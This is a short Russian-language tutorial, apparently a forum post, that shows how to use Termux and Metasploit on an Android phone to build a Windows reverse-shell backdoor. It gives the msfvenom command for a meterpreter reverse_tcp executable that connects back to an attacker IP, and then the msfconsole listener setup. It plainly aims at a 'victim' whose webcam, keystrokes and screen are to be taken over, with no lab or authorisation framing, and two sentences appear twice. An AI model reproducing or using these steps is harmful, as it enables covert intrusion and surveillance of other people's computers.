Данный бэкдор использует уязвимость OC windows с помощью терминала TERMUX и metasploit framework.
Благодаря этой уязвимости мы можем коннектиться к веб камере, включать кейлогер, убивать процессы, скринить рабочий стол и многое другое.
Итак приступим:
Благодаря этой уязвимости мы можем коннектиться к веб камере, включать кейлогер, убивать процессы, скринить рабочий стол и многое другое.
Итак приступим:
- Скачиваем TERMUX с playmarket
- Открываем и вводим команду: #pkg upgrade
- Теперь клонируем metasploit: #git clone https://github.com/rapid7/metasploit-framework
- Переходим в директорию metasploit #cd metasploit-framework
- Теперь создаём эксплоит
#msfvenom -p windows/meterpreter/reverse_tcp lhost=IP атакующего lport=4444 -f exe R > /sdcard/mypayload.exe
Файл сохраняется в корне хранилища. - Запускаем metasploit #msfconsole
- #set payload windows/meterpreter/reverse_tcp
- #set LHOST 192.168.1.65 (IP атакующего)
- #set LPORT 4444
- #run
- Всё metasploit запущен, теперь необходимо запустить mypayload.exe на машине жертвы.
- Если появилась строка Meterpreter session 1 opened, то мы успешно подключены.
- Чтобы увидеть список возможностей # -h или ?
